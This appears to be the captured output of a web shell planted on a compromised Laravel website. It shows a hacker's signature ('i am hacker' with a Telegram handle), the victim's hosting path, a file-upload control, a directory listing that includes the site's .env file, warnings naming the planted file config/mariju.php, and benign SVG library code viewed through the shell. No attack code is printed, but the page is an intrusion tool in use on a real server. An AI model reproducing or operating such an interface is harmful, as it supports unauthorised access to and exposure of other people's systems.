telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log27268415 KBJuly 19 2025 05:31:390644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
instances++; if ($this->instances > 1) { //TODO: log circular reference error state return; } if (isset($attributes['x'])) { $this->x = $attributes['x']; } if (isset($attributes['y'])) { $this->y = $attributes['y']; } if (isset($attributes['width'])) { $this->width = $attributes['width']; } if (isset($attributes['height'])) { $this->height = $attributes['height']; } parent::before($attributes); $document = $this->getDocument(); $link = $attributes["href"] ?? $attributes["xlink:href"]; $this->reference = $document->getDef($link); $surface = $document->getSurface(); $surface->save(); $surface->translate($this->x, $this->y); } protected function after() { if ($this->instances > 0) { return; } parent::after(); $this->getDocument()->getSurface()->restore(); } public function handle($attributes) { if ($this->instances > 1) { //TODO: log circular reference error state return; } parent::handle($attributes); if (!$this->reference) { return; } $originalAttributes = array_merge($this->reference->attributes); $originalStyle = $this->reference->getStyle(); $mergedAttributes = $this->reference->attributes; $attributesToNotMerge = ['x', 'y', 'width', 'height', 'href', 'xlink:href', 'id', 'style']; foreach ($attributes as $attrKey => $attrVal) { if (!in_array($attrKey, $attributesToNotMerge) && !isset($mergedAttributes[$attrKey])) { $mergedAttributes[$attrKey] = $attrVal; } } $mergedAttributes['style'] = ($attributes['style'] ?? '') . ';' . ($mergedAttributes['style'] ?? ''); $this->_handle($this->reference, $mergedAttributes); $this->reference->attributes = $originalAttributes; if ($originalStyle !== null) { $this->reference->setStyle($originalStyle); } } public function handleEnd() { $this->instances--; if ($this->instances > 0) { return; } if ($this->reference) { $this->_handleEnd($this->reference); } parent::handleEnd(); } private function _handle($tag, $attributes) { $tag->handle($attributes); foreach ($tag->children as $child) { $originalAttributes = array_merge($child->attributes); $originalStyle = $child->getStyle(); $mergedAttributes = $child->attributes; $mergedAttributes['style'] = ($attributes['style'] ?? '') . ';' . ($mergedAttributes['style'] ?? ''); $this->_handle($child, $mergedAttributes); $child->attributes = $originalAttributes; if ($originalStyle !== null) { $child->setStyle($originalStyle); } } } private function _handleEnd($tag) { foreach ($tag->children as $child) { $this->_handleEnd($child); } $tag->handleEnd(); } }